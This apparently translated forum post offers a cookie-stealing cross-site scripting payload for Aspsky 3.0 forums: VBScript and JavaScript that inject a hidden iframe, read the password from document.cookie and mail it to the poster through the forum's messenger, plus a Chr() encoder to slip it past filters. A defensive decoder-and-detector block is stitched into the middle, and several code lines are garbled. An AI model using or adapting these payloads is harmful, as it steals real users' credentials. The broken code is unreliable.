The Self.window way to see the wings of lust
In fact, I have long had a method that I never told anyone about.
I have played with it for a long time, so here it is, hehe:
<script language=vbs>
Sub Changeq ()
If form1.loc.value= "" or form1.who.value= "" Then
MsgBox "No address or user name added?"
Exit Sub
End If
Loc=form1.loc.value
User=form1.who.value
Str= "rtadjacenthtml" ("BeforeEnd" "," "<div style=display:none&gt;<iframe id=sendmessage></iframe></div> ""): Call sendmessage.window.open ("" "& Loc &"/messanger.asp?action=send&touser= " & user & "&title=" +mid (Document.cookie,instr LCase (Document.cookie), "" "Password" "+9,10) +" "&message=" "+" "I am a Good Boy "", "" _self "") "/>"
Form1.area.value=str
End Sub
</script>
<body>
<font size=7 Color=red>aspsky 3.0 Steal---c.z.y original </FONT>
<form name=form1>
Set send address: <input type=text name=loc size=50><br>
▲ The send address has the form Http://www.nnit30.com/newbbs (newbbs is the forum's installation directory on the website; do not add a / at the end) <br>
User name to send to: <input type=text name=who size=20>-------------
<input type=button name=change value="Generate Code" onclick="changeq()"><br>
Generated code: <textarea name=area rows=10 cols=100></textarea>
</form>
</body>
This is the result of most of a day's work: code that steals Aspsky 3.0 passwords. Change the following
and then put it in your post; as long as someone reads your post, his password is automatically sent to your
mailbox in the forum. Cool, right? I wrote this one in VBScript; snwcwt wrote one in JavaScript.
It has no problem with double quotes, and several lines of code can be written at once, so it is practical!!
The effect is about the same, though, ha. (Note: first change the send address in the following;
it must all be written on one line.)
Simplified form: window.open (URL to open, window name, window size settings)
The URL to open:
The first part: http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send .....
The corresponding encoding is a Chr() chain, one Chr(n) per character, joined with &.
For a different site this part has to be changed; pay attention to where it ends. The name of the user the message is sent to is also changed here.
For the encoding, look at the following code:
<script language=vbs>
Sub Main ()
' Read the string typed into the text box
Base=form1.text1.value
' Emit one Chr(<character code>) per character, each followed by &
For I=1 to Len (base)
AA=ASC (Mid (base,i,1))
document.write "Chr (" & AA & ")" & "&"
Next
End Sub
</script>
<body ><form name=form1><table>
<tr><td>
<input Type=text Name=text1 size=40><br>
<input Type=button name=button1 onclick="main()" value=change>
</td></tr>
</table></form></body>
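Seen from the forum operator's side, the Chr() encoding above hides strings such as document.cookie from a filter that only scans the raw post text. The following JavaScript is an added example, not code from the original page: it decodes Chr(n)&Chr(n) runs in a submitted post and reports indicators that only become visible after decoding. The indicator list, the function names and both sample posts are assumptions constructed for the illustration.

```javascript
// Added defensive example: decode Chr(n)&Chr(n)... runs in user-submitted
// markup and flag posts whose decoded text touches cookies or script sinks.

// One run = two or more Chr(<decimal>) calls joined by & or + (spaces allowed).
const CHR_RUN = /chr\s*\(\s*\d{1,5}\s*\)(?:\s*[&+]\s*chr\s*\(\s*\d{1,5}\s*\))+/gi;

// Indicators chosen from the techniques this page describes (assumed list).
const INDICATORS = [
  /document\s*\.\s*cookie/i,
  /insertadjacenthtml/i,
  /window\s*\.\s*open/i,
  /(?:java|vb)script\s*:/i,
  /messanger\.asp/i,
];

// Replace every Chr() run with the characters it encodes.
function decodeChrRuns(text) {
  return text.replace(CHR_RUN, (run) =>
    Array.from(run.matchAll(/\d+/g), (m) => String.fromCharCode(Number(m[0]))).join("")
  );
}

// Inspect one post body: decoded text, matched indicators, and whether
// at least one indicator was hidden until the Chr() runs were decoded.
function inspectPost(body) {
  const decoded = decodeChrRuns(body);
  const hits = INDICATORS.filter((re) => re.test(decoded)).map((re) => re.source);
  const obfuscated = INDICATORS.some((re) => re.test(decoded) && !re.test(body));
  return { decoded, hits, obfuscated };
}

// Constructed samples. encodeAsChr mirrors the encoder shown on the page and
// is used here only to build test input from a harmless marker string.
function encodeAsChr(s) {
  return Array.from(s, (c) => `Chr(${c.charCodeAt(0)})`).join("&");
}
const samplePost = `<img src="vbscript:x=${encodeAsChr("document.cookie")}">`;
const benignPost = "Price list: Chr(65) is just the letter A.";

console.log(inspectPost(samplePost));
console.log(inspectPost(benignPost));
```

A post flagged with `obfuscated: true` is worth rejecting or quarantining outright, since ordinary forum content has no reason to assemble those strings character by character.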
Part II: Extracting the user name and password from the cookie
------------------------One more JS version to study----------------------------------
' username=\');
var iuser1=mycookie.indexOf(\'&\', iuser0);
if (iuser1==-1) iuser1=mycookie.length;
var username=mycookie.substring(iuser0+9, iuser1);
var ipw0=mycookie.indexOf(\'password=\');
ipw1=mycookie.indexOf(\'&\', ipw0);
if (ipw1==-1) ipw1=mycookie.length;
var password=mycookie.substring(ipw0+9, ipw1);
document.body.insertAdjacentHTML(\'beforeend\', \'<div style=display:block><iframe id=sendmessage src=messanger.asp?action=new&touser=snwcwt></iframe></div>\');
sendmessage.window.document.location=\' cwt&title=\'+username+\' password &message=username=\'+username+\' password=\'+password+\';')' />